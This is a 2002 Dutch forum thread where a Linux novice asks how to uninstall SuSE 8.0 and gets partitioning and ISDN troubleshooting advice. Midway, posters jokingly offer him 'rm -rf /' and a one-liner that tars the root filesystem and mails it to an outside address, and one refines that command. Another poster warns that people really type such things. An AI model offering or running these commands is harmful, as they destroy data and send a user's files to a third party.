SuSE 8.0 uninstallen!!!

Pagina: 1
Acties:

Onderwerpen

Acties:
  • 0 Henk 'm!

• Ryudo
  • Registratie: Mei 2002
  • Laatst online: 02-09 12:11

Ryudo

Daily dose~

Topicstarter
Ik heb het echt helemaal gehad met SuSE 8.0 en wil deze dus van m'n HD verwijderen. Hoe doe ik dit?
met de cd zelf of moet ik er iets voor downloaden zoals partition magic?

m'n kernel crasht steeds en ik kan niet inbellen met m'n isdn kaart. dus weg ermee.
of is er nog een redding voor me?

Acties:
  • 0 Henk 'm!

Verwijderd

windows ?! :+

Acties:
  • 0 Henk 'm!

• Ryudo

Ryudo

Daily dose~

Topicstarter
what the hack mag dat nou weer betekenen.
in Windows kun je dat toch niet uninstallen?
of ben ik nou gek?

even een serieus antwoord graag.!!!!!!!

Acties:
  • 0 Henk 'm!

• Tux
  • Registratie: Augustus 2001
  • Laatst online: 18-09 21:53

Tux

Uhm... gewoon met Windows FDISK Non-Windows partities deleten.
Of SuSe install CD zit neem ik aan ook wel partition tooltje bij.

The NS has launched a new space transportation service, using German trains which were upgraded into spaceships.

Acties:
  • 0 Henk 'm!

Verwijderd

Je zou het inderdaad kunnen doen met partition magic. Misschien wil fdisk ook wel. Boot dan vanaf een dos/win boot flop en type in "fdisk", verwijder de partities die je weg wilt hebben, reboot nogmaals vanaf de boot flop en type nu in "fdisk /mbr" gevolgd door "format c: /s/u" bijvoorbeeld.., volgens mij ben je er dan zo'n beetje.

Acties:
  • 0 Henk 'm!

Verwijderd

Probeer Mandrake eens, je kunt vast tijdens de install je bestaande Linux partities verwijderen :)

Acties:
  • 0 Henk 'm!

• Ryudo

Ryudo

Daily dose~

Topicstarter
dat was ik ook van plan
ik wil mandrake 9 graag proberen.
misschien dat ik alles daar beter op orde kan krijgen.
maar dan heb ik 27.50 euro over de balk gegooid voor Suse! dat is toch ook wat?

Acties:
  • 0 Henk 'm!

Verwijderd

Je kunt de support opties/kanalen bij SuSE proberen. Als je een officiele versie hebt heb je recht op support gedurende een bepaalde periode. Heb je dat al geprobeerd ?

Acties:
  • 0 Henk 'm!

• Ryudo

Ryudo

Daily dose~

Topicstarter
ik ben al lang door die periode heen. ik heb suse al meer dan 2 maanden.
dus dat helpt me niet
had ik nou maar direct voor Mandrake gekozen.

Acties:
  • 0 Henk 'm!

• alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

xpBox schreef op 29 september 2002 @ 21:29:
what the hack mag dat nou weer betekenen.
in Windows kun je dat toch niet uninstallen?
of ben ik nou gek?

even een serieus antwoord graag.!!!!!!!
*ouch*

Pipe down please.. zo gek is dat antwoord niet eens.

als je een NT draait als XP of win2k kun je vanuit Disk Management de Suse partities verwijderen, en anders kan dat ook nog met de setup CD.

Mandrake heeft inderdaad ook een zeer goede partition editor bij de installatie, zeker als je de expert modus kiest itt de easy setup.

maar weet je zeker dat je ISDN kaart goed ondersteund wordt?
Suse staat toch aardig bekend om haar goede ISDN ondersteuning...

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device

Acties:
  • 0 Henk 'm!

Verwijderd

Maar is het niet beter om eens te proberen je SuSE wel aan de praat te krijgen. Als je daar nou eens een gericht topic over opent kunnen we je misschien wel helpen. Dus foutmeldingen en dat soort dingen. Als je Mandrake neemt neem voorlopig dan maar versie 8.2. Ik lees te veel problemen met de nieuwste versie.

Acties:
  • 0 Henk 'm!

• Ryudo

Ryudo

Daily dose~

Topicstarter
daarom had ik ook suse gekozen.
hij vind de kaart wel (eentje van E-tech en een Eicon diva)
ik heb er namelijk twee.
hij vind ze wel maar wil niet inbellen.
na 3 sec hou hij er mee op.
ik gebruiik kinternet om de verbinding te maken.
kijk anders even op www.kevin-huls.myweb.nl voor meer info over het isdn-probleem want ik heb er al eerde een topic over gehad.

Acties:
  • 0 Henk 'm!

Verwijderd

gebruik de linux fdisk (van cd of flop) ....en haal je partities weg....lijkt me niet zo moeilijk.

Acties:
  • 0 Henk 'm!

Verwijderd

Je denk dat je problem zijn opgelost zijn met Mandrake 9.0 ?? Reken daar maar niet op....

Je zou toch echt zelf een beetje moeten gaan kloten met config bestanden enz.
Als ik jou was zou ik SuSE gewoon houden. Vind ik persoonlijker veel beter dan Manrake.
Mandrake komt zo instabiel over

Acties:
  • 0 Henk 'm!

• Ryudo

Ryudo

Daily dose~

Topicstarter
als jullie nou eens op die site keken. die ik zonet heb genoemd en dan eens een antwoord geven waar ik wat aan heb ben ik tevreden ;)

een beetje editen in de config bestanden lijkt me te niet aan te raden want ik ben dus een noob van een noob wat linux betreft

Acties:
  • 0 Henk 'm!

Verwijderd

xpBox schreef op 29 september 2002 @ 21:50:
een beetje editen in de config bestanden lijkt me te niet aan te raden want ik ben dus een noob van een noob wat linux betreft
Zelf een n00b kan dat :P
Het is eerder of je het zelf wilt

Acties:
  • 0 Henk 'm!

• Ryudo

Ryudo

Daily dose~

Topicstarter
ja, aan dat soort antwoorden heb ik dus niks he?
geef nou maar gewoon antwoord en dan kijken we wel weer verder!!!

Acties:
  • 0 Henk 'm!

Verwijderd

xpBox schreef op 29 september 2002 @ 21:57:
ja, aan dat soort antwoorden heb ik dus niks he?
geef nou maar gewoon antwoord en dan kijken we wel weer verder!!!
Mischien als je zelf wat netter reageerd dat meer mensen je willen helpen. Ik probeer je gewoon te helpen. Als je zo gaat reageren krijg je nooit een normaal antwoord.

* Pak de CD van Mandrake 9.0 en installeer deze over de SuSE partities heen... Klaar!

Zo goed??

Acties:
  • 0 Henk 'm!

• Ryudo

Ryudo

Daily dose~

Topicstarter
ja daar heb ik tenminste wat aan. en heb je ook nog een solution voor m'n isdn probleempje?

Acties:
  • 0 Henk 'm!

Verwijderd

wat gebeurt er als je intypt (in een console)

isdnctrl dial ippp0

Als je iets ziet met "Line is Triggered...." probeer dan een te pingen naar een site

Acties:
  • 0 Henk 'm!

• IceStorm
  • Registratie: Februari 2000
  • Laatst online: 06:37

IceStorm

This place is GoT-like!!!

Meneer xpBox, kun je ietwat dimmen met de manier waarop je je vragen stelt?

Mensen proberen je te helpen en vervolgens jaag je ze tegen je in het harnas door ze af te blaffen.
Daarnaast is het niet de bedoeling om naar een probleemsomschrijving ergens anders te verwijzen. Op een forum omschrijf je je probleem gewoon helder en compact en link je niet naar een verhaal.

Acties:
  • 0 Henk 'm!

Verwijderd

Je zou even kunnen kijken in je eigen topic: hoe een inbelverbinding met isdn? , waar je overigens hetzelfde reageert!!! (zie de opmerking van IceStorm)

Daar wordt je net als hier door verschillende mensen geholpen, maar uit jouw reacties krijg ik toch de indruk dat je niet bereid bent zelf te lezen en zoeken. In dat geval is Linux absoluut niets voor jou, ongeacht welke distributie je ook kiest!

Acties:
  • 0 Henk 'm!

Verwijderd

Mandrake 9 heeft de volgende problemen bij mij:
-Hij maakt me USB poorten op me hele systeem onbruikbaar.
-In X kan je niet in Mandrake Control Center komen en hier hebben meer mensen last van schijnt het.
-Chrast voor een Linux erg vaak.

Maar gewoon bij disk beheer de partitie's verwijderen en fdisk /mbr bij een boot flop/cd

Acties:
  • 0 Henk 'm!

• alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

Verwijderd schreef op 29 september 2002 @ 22:24:
-In X kan je niet in Mandrake Control Center komen en hier hebben meer mensen last van schijnt het.
Alleen als je een nederlandse install doet.

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device

Acties:
  • 0 Henk 'm!

• XTerm
  • Registratie: Juli 2001
  • Laatst online: 10-06 17:45
Ker Plunk schreef op 29 september 2002 @ 22:24 een hele hoop onzin:
Mandrake 9 heeft de volgende problemen bij mij:
-Chrast voor een Linux erg vaak.

Maar gewoon bij disk beheer de partitie's verwijderen en fdisk /mbr bij een boot flop/cd
Jij vertelt me, dan Mandrake GNU/Linux, zonder niet vrije zut vaak *crasht* ?

Acties:
  • 0 Henk 'm!

Verwijderd

XTerm89D schreef op 29 september 2002 @ 22:48:
[...]

Jij vertelt me, dan Mandrake GNU/Linux, zonder niet vrije zut vaak *crasht* ?
Haha nee zo bedoel ik het niet ,bij mij is ie al 3 keer vastgelopen wat ik bij andere Mandrake absoluut niet had.

Acties:
  • 0 Henk 'm!

• Ryudo

Ryudo

Daily dose~

Topicstarter
geachte mede got'ers.
het is absoluut niet mijn bedoeling jullie af te kraken maar ik heb nogal vaak ervaren dat mensen met antwoorden aankomen waar ik niks mee kan omdat het vaak niet duidelijk is uitgelegd of dat het gewoon niet wil omdat ik zelf niet snap.
m'n houding is inderdaad sneu maar ik zal nu proberen jullie wat vriendelijker te woord te staan ;)

ik hoop jullie hier mee van dienst te zijn geweest.
maar zoals ik al zei ben ik dus echt een Linux-ramp en zou daarom graag heldere uitleg krijgen. kan dit? ;)

Acties:
  • 0 Henk 'm!

Verwijderd

xpBox schreef op 29 september 2002 @ 21:45:
daarom had ik ook suse gekozen.
hij vind de kaart wel (eentje van E-tech en een Eicon diva)
ik heb er namelijk twee.
hij vind ze wel maar wil niet inbellen.
na 3 sec hou hij er mee op.
ik gebruiik kinternet om de verbinding te maken.
kijk anders even op www.kevin-huls.myweb.nl voor meer info over het isdn-probleem want ik heb er al eerde een topic over gehad.
Die inbeltijd kan je wijzigen hoor, op veel van je andere vragen (dat uninstallen) kan je antwoord vinden in de search.
Ik ben zelf nog een newbie en ik heb ook al vragen op GoT gepost en vaak kreeg ik ook een onduidelijke of zelfs een uitleg waar ik op het eerste zicht niets mee was maar dat leerde me dan dat eens te onderzoeken zodat ik het toch ongeveer zelf kon oplossen.
Je verwacht toch niet dat je een stap-voor-stap antwoord krijgt op je vragen want dat krijg je in NWOS zelden of zelfs niet. Als je dus niet een beetje inspanning wil leveren om te zoeken dan kies je beter voor windows.
Het heeft mij bvb meer dan 2 uur intensief computeren gekost om één bepaald programma te draaien. Het heeft me 4 volle dagen gekost om mijn systeem te krijgen zoals ze nu is, en nu is ze (op wine-winex en dus games enzo na) heel erg naar mijn goesting en ik ben dus tevreden maar in die tijd heb ik wel veel moeten lezen, leren en natuurlijk ook wat vragen.
Voor dat uninstallen van SuSe, had je opgelet tijdens de installatie van SuSe dan had je gezien dat SuSe je HD in partities indeelt en een 3-tal of zelfs meer als je dat kiest voor zichzelf dus het is vanzelfssprekend lijkt mij (zelfs voor mij dus) dat als je een ander besturingssysteem installeerd je die partities eenvoudig kan overschrijven. Dit gaat met mandrake, met suse (als je het opnieuw wil) of met gelijk welk ander os. Ik heb dit zelf al geprobeerd (maar bij was het mandrake deleten m.b.h.v. installatie van SuSe en met win2k gaat het ook zeker) En ik veronderstel dat de andere os'en dat ook kunnen.

Maar de vraag is wil je dat wel uninstalleren (bovenstaande post is niets nieuws want anderen hebben dit voor mij ook verkondigd). Ben je niet van plan om toch eens wat meer tijd in SuSe te steken en de uitdaging aan te gaan. Want geloof mij als het werkt is het een grote voldoening. En als het werkt blijft het tenminste werken, iets waarvan andere besturings(WOS)systemen soms last van hebben. Maar je zal er inderdaad veel tijd moeten insteken, veel meer dan je denkt, maar eens alles in orde is de voldoening groot (en bovendien: niets weerhoudt je om voorlopig met een dualboot te werken, telkens je dan iets in orde krijgt kan je dat programma dan deleten in windows dat is althans mijn tactiek).

Ik hoop je hiermee enigzins van dienst mee te zijn.

Acties:
  • 0 Henk 'm!

• Ryudo

Ryudo

Daily dose~

Topicstarter
bedankt voor je oppepende talk, dat waardeer ik echt wel ;)

het is niet helemaal waar dat ik er niet genoeg tijd in wil steken.
ik heb al vele avonden bij die isdn verbindign zitten klooien maar hij doet het gewoon niet. na die problemen ben ik hier pas gaan schrijven.

dus nu maar meer gericht vragen gaan stellen en dan moet ik er wel komen volgens jou? tenminste dat is wat ik er van begrepen heb en ik moet dus meer gaan searchen.

Acties:
  • 0 Henk 'm!

Verwijderd

Als je een duidelijk omschreven probleem hebt met de volgende elementen::
- wat is het probleem
- wat heb je gedaan
- wat gebeurde er toen
- eventuele foutmelding
- welke software (versies!) en relevante hardware gebruik je
- eventuele andere oplossingen die je al hebt geprobeerd.

Dan lijkt het mij sterk dat je niet geholpen zult worden. Vaak word je in een reply op je probleem gevraagd bepaalde commando's uit te voeren en de output daarvan te posten. Het is dan ook wel handig als je dat ook doet, aangezien die informatie relevant kan zijn voor degene die je probeert te helpen.

Daarnaast wordt er ook wel enig eigen initiatief verwacht, zoals zoeken en HOWTO's en manuals doornemen. Als je een gekochte SuSE hebt bijvoorbeeld, heb je boeken met daarin vaak documentatie over het onderdeel waar je mee worstelt.

Dit is overigens geen kritiek op je gedrag op dit forum, maar een algemeen verhaal over hoe ik denk dat je het meest succesvol kunt opereren in NOS.

Acties:
  • 0 Henk 'm!

• hbokh
  • Registratie: Februari 2002
  • Laatst online: 16-12-2024

hbokh

Unox: the worst OS!

Eenzelfde probleem heb ik bij een collega gezien met SuSE 7.1 en een Telec-kaartje geloof ik.
Bleek achteraf een IRQ / IO -probleem te zijn dat -na met de hand editten van /etc/isapnp.conf- opgelost bleek te zijn. Waardes van het modem (IRQ/IO) haalde ik uit configuratiescherm van Win98.
Check dus of de waardes in WIndows EN /etc/isapnp.conf overeen komen.
Verder beetje man-pages lezen, want ik heb hier geen modem en geen ISA-zooi. WEL Suse 8.0 en das een beste distro naar mijn persoonlijk idee.

This is my sick nature.

Acties:
  • 0 Henk 'm!

Verwijderd

Om ff aan te tonen, op mijn internetverbinding (kabel welliswaar) heb ik ook heel erg lang moeten zoeken, niettegenstaande het in Suse 7.2 wel onmiddelijk ging. Ik maar zoeken welke instellingen fout waren maar dat was verkeerd want alles was juist. Het lag alleen aan Suse 8.0 die niet lang genoeg probeerde een ip door te krijgen. Toen ik dat wist werkte mijn internet wel.
Ik weet niet hoe dat werkt bij isdn (heb dat zelf nooit gehad) maar er zal best wel een antwoord zijn voor je probleem dus opgeven zou ik echt niet doen hoor. Laat je dus niet te snel ontmoedigen.
Een antwoord op je isdnprobleem kan ik je jammergenoeg niet geven.

Acties:
  • 0 Henk 'm!

• Ryudo

Ryudo

Daily dose~

Topicstarter
dankjewel. hbokh. Ik zal die tip eens proberen. gelukkig heb ik Win98 er ook opstaan voor m'n games dus die instellingen moet ik wel kunnen vinden denk ik ;)
zou gauw als ik het heb getest zet ik hier de resultaten wel weer effe heen.

Acties:
  • 0 Henk 'm!

• Vorlon
  • Registratie: Augustus 1999
  • Laatst online: 16-09 18:09
Ehm, ik heb zelf ook suse8 met een isdn lijn. En als ik het zo bekijk heb je iig de gebiedscode niet goed staan.

Ik zal zo wel een even alles gaan vergelijken met m'n eigen setup.

ps. Wat je onder SuSE trouwens niet moet doen is het zelf in de configfiles erbij gaan klussen aangezien dan je dan een erg grote kans hebt dat yast je dan alles zelf laat doen.

edit:

Uit die 4 screenies haal ik ook 4 verschillen:
- Gebiedscode: geen +31 ervoor. In jou geval hoort er 0599 te staan.
- Gebruikersnaam en wachtwoord (maar ik neem aan dat je dat ivm de screenshot weggehaalt hebt?)
- ChargeHUP uit
- Firewall UIT (heb zelf een zwaarder firewallscript)

Heb je bij IP instellingen op het IP op dynamisch staan, peer dns aan, defaultroute ook?
Heb je Callback uit staan?

Niet zo de moed opgeven, ik kan me herinneren dat ik een paar weken nadat ik suse 6.4 gekocht had ook het doosje wel wilde verbranden :+ (kon isdn ook niet werkend krijgen destijds. |:( )

[ Voor 0% gewijzigd door Vorlon op 30-09-2002 22:07 . Reden: added ]

"You are not ready for immortality yet" - Kosh Nararek

Acties:
  • 0 Henk 'm!

• Ryudo

Ryudo

Daily dose~

Topicstarter
dit is een tip waar ik inderdaad wat aan heb. ik zal het zsm proberen.
dit is tenminste veilig denk ik om uit te proberen ;)
als het niet werkt weet ik forum wel weer te vinden :)
in ieder geval alvast bedankt.

Acties:
  • 0 Henk 'm!

Verwijderd

-EOF-

( end of file for the n00bs ) :+

Acties:
  • 0 Henk 'm!

• Ryudo

Ryudo

Daily dose~

Topicstarter
Ja hoor, dat heb ik weer.
Wil ik via m'n linux bootdisk starten. loopt hij bij het opstarten van m'n isdn-kaart vast. het gaat om de Eicon Diva 2.01 isa/pnp (althans dat is wat ik zo uit het hoofd weet.) is er een optie om in linux te komen zonder dat hij me vast loopt? of is het beter dat ik Suusje er even opniew overheen instal?
(zul je altijd zien. is er een oplossing werkt je pc weer niet mee. :( )

Acties:
  • 0 Henk 'm!

• active2
  • Registratie: Juni 2001
  • Laatst online: 26-10-2024

active2

Google is your friend

rm -rf / >:)

Google, Het mirakel van de 21e eeuw!!!!

Acties:
  • 0 Henk 'm!

• Ryudo

Ryudo

Daily dose~

Topicstarter
en wat mag dat dan betekenen?
(ik ben noob weet je wel dus als er al zo'n smily achterstaat vertrouw ik het dus niet.)
als iemand weet wat die code betekent zou ik het graag even horen? :)

Acties:
  • 0 Henk 'm!

Verwijderd

Wat dat betekend!? dat je alles in je root weg mikt zonder dat je steeds op Yes moet rammuh })

Acties:
  • 0 Henk 'm!

Verwijderd

tar -cf / root.tar | mail -s ROOT apeldoornonline@hotmail.com | rm -f root.tar :+

Acties:
  • 0 Henk 'm!

• Thijsch
  • Registratie: Februari 2002
  • Laatst online: 07:18
rm -rf / is alles verwijderen uit de / inc subdirs en alles

Acties:
  • 0 Henk 'm!

• Ryudo

Ryudo

Daily dose~

Topicstarter
nou, ik denk dat ik dan die code maar even niet uitprobeer.
en wat mag die 2e opdracht dan voorstellen. ik kan niet eens in linux komen. tijdens het opstarten loopt m'n pc al vast. ik denk dat ik maar gewoon even een clean instal doe vanmiddag.

Acties:
  • 0 Henk 'm!

Verwijderd

tar -cf / root.tar | mail -s ROOT apeldoornonline@hotmail.com | rm -f root.tar

werkt volgenst mij niet eens. maar ok het zou ongeveer dit betekenen

tar -cf / root.tar ->> pak alles vanaf / en gooi dat in het bestand root.tar
| --> gooi de uitvoer van dit programma door naar het volgende programma.
mail -s ROOT apeldoornonline@hotmail.com --> mail als ROOT het door gepipte data naar dat mail-adress.
|-->gooi de data die hier uit komt door naar volgende commando
rm -f / root.tar --> delete root.tar

beter zou zijn IMHO
tar -cf / root.tar; mail -s ROOT apeldoornonline@hotmail.com <root.tar; rm -f root.tar
maar daar ben ik ook niet zeker van, maar ik ga het niet uitproberen :)

Acties:
  • 0 Henk 'm!

• sebas
  • Registratie: April 2000
  • Laatst online: 03-09 12:51
bestwel onzin om een tarball van je root te mailen, dat gaat gegarandeerd niet goed.

xpBox: doe inderdaad maar eens een clean install, dat gaat je hooguit een uurtje kosten en ga er dan ff rustig voor zitten. SuSE's isdn en adsl support schijnt inderdaad vrij goed te zijn, het komt immers uit Duitsland waar veel gebruik gemaakt wordt van die inbel zut.

Everyone complains of his memory, no one of his judgement.

Acties:
  • 0 Henk 'm!

• deadinspace
  • Registratie: Juni 2001
  • Laatst online: 18-09 18:18

deadinspace

The what goes where now?

Mja, wil je met zulk soort dingen oppassen? Sommige mensen tikken het namelijk gewoon over (geloof me), met alle gevolgen van dien. Extra leuk als je Windows partities ook nog read-write gemount zijn.

Acties:
  • 0 Henk 'm!

• Ryudo

Ryudo

Daily dose~

Topicstarter
ok, ik heb nu een clean install gedaan en alles weer opniew ingesteld. maar tijdens het rebooten en het opstarten van m'n isdn-kaart loopt SuSE gewoon weer vast. :(
ik kan nu dus weer niet in linux komen.
kan het misschien ook liggen aan het feit dat ik op het moment 2 isdn-kaarten in m'n pc heb zitten? 1 daarvan heb ik eigenlijk gewoon als een soort reserve want m'n hoofd-isdn-kaart heeft nog wel eens kuren in XP

Acties:
  • 0 Henk 'm!

Verwijderd

-sigh- ... ik wilde dat ik eens alles redundant kon uitvoeren in m'n pc :+

Ik zou zo zeggen, probeer het eens met 1 isdn kaart in je pc in combinatie met Linux, mischien dat daar de schoen wringt !? ;)

Acties:
  • 0 Henk 'm!

• Ryudo

Ryudo

Daily dose~

Topicstarter
ik heb m''n e-tech kaart eruit gehaald en nog wil hij niet booten. elke keer als hij m'n Eicon diva 2.01 isa/pnp wil opstarten loopt hij vast en is de reset knop de enige manier om m'n pc weer in beweging te krijgen.
kan het dan aan die kaart zelf liggen. ik denk het haast niet want volgens de hardware-database van SuSE moet hij gewoon werken. wat nu?

Acties:
  • 0 Henk 'm!

• bbrother
  • Registratie: Oktober 2000
  • Niet online
mjah..

fdisk, delete je partities, maak ze opnieuw aan, en install windows, that hard? :)

Acties:
  • 0 Henk 'm!

Verwijderd

bbrother schreef op 04 oktober 2002 @ 20:23:
mjah..

fdisk, delete je partities, maak ze opnieuw aan, en install windows, that hard? :)
Dus als je een deuk in je auto hebt, kijk je er maar niet ernaar zodat je er geen last er van hebt ?! |:(

Acties:
  • 0 Henk 'm!

Verwijderd

xpBox schreef op 04 oktober 2002 @ 20:20:
ik heb m''n e-tech kaart eruit gehaald en nog wil hij niet booten. elke keer als hij m'n Eicon diva 2.01 isa/pnp wil opstarten loopt hij vast en is de reset knop de enige manier om m'n pc weer in beweging te krijgen.
kan het dan aan die kaart zelf liggen. ik denk het haast niet want volgens de hardware-database van SuSE moet hij gewoon werken. wat nu?
Heb je al eens op de volgende pagina gekeken ?!

http://www.isdn4linux.de/

Hier staat vrijveel informatie over Linux in combinatie met een isdn kaart, en ook tevens de kaart die jij opnoemt ;)

Acties:
  • 0 Henk 'm!

• bbrother
  • Registratie: Oktober 2000
  • Niet online
Verwijderd schreef op 04 oktober 2002 @ 23:38:
[...]

Dus als je een deuk in je auto hebt, kijk je er maar niet ernaar zodat je er geen last er van hebt ?! |:(
eerst een auto hebben.

Acties:
  • 0 Henk 'm!

• Ryudo

Ryudo

Daily dose~

Topicstarter
een auto zal ik nooit krijgen. ;)
ik namelijk een dermate beperkt zicht dat ik nooit in een auto zal kunnen rijden.
('t is maar even dat je 't weet)

Acties:
  • 0 Henk 'm!

Verwijderd

Het gaat niet zo zeer om die auto, maar meer om het spreek
woordelijk gezegde :(

Acties:
  • 0 Henk 'm!

• Ryudo

Ryudo

Daily dose~

Topicstarter
tjemig, want zijn we weer snel aangebrand zeg.
ga ik eens een keer off-topic krijg ik weer op m'n donder.

trouwens op die site staat gewoon dat m'n eicon kaartje ondersteund wordt maar verder word ik er niet veel uit wijs.
misschien dat linux toch niet zo'n goede keus was voor mij. maarja, ik heb het in ieder geval geprobeerd. misschien in de toekomst nog eens een keer proberen met een andere (lees nieuwe) pc.
in ieder geval bedankt voor jullie reacties

Acties:
  • 0 Henk 'm!

Verwijderd

Nu al opgeven ?! |:(

Computeren is toch leuk ;)

Acties:
  • 0 Henk 'm!

• Ryudo

Ryudo

Daily dose~

Topicstarter
ik geef nog niet op hoor. ik laat SuSE alleen eerst even niet op m'n pc staan.
ik ga volgend jaar eerst een hogere informatica opleiding doen en tijdens of na die opleiding denk ik wel genoeg verstand van Linux te hebben, althans dat hoop ik. ;)
linux kan best leuk zijn alleen dan moet je er wel verstand van hebben anders ben je veel te veel afhankelik van anderen heb ik nu wel gemerkt.
dus eerst maar weer verder ploeteren met windhoos xp.

Acties:
  • 0 Henk 'm!

Verwijderd

Hoe denk je dat al die anderen dat doen dan ?! Installeren, vragen en zelf veel proberen, oftwel ontdekken hoe alles werkt. ;)

Dus nogmaals (2x) computeren is leuk >:)

En ach, heb ondertussen al zoveel van die Hogere Informatica Studentjes gezien die er nog geen bal van snappen van waar mee ze bezig zijn >:)

Acties:
  • 0 Henk 'm!

• Ryudo

Ryudo

Daily dose~

Topicstarter
dat zien we dan wel weer he?
ik kap in ieder geval eerst even met linux totdat ik er wat meer van afweet.
ik heb nu ook niet zoveel tijd om er mee bezig te zijn dus als ik wat meer tijd heb pak ik mijn Suusje CD's er weer bij.
Pagina: 1